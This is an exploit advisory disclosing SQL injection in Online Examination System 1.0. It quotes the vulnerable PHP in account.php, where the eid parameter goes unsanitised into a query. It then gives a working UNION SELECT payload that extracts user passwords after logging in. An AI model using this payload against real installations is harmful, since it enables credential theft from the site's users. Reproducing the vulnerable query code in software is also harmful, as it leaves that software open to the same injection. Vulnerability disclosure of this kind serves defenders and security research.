Online Examination System version 1.0 suffers from a remote SQL injection vulnerability.
# Exploit Title: Online Examination System - SQL Injection
# Google Dork: N/A
# Date: 2022-9-28
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/
# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0
Vulnerability Details
======================
Steps :
vulnerable code in file account.php
<?php
if(@$_GET['q']== 'quiz' && @$_GET['step']== 2) {
$eid=@$_GET['eid'];
$q=mysqli_query($con,"SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' " );
echo '<div class="panel" style="margin:5%">';
while($row=mysqli_fetch_array($q) )
?>
1) Log in to the application after register new user
inject payload paramter eid => eid=5589741f9ed52' union select 1,2,password,4,5 from user--
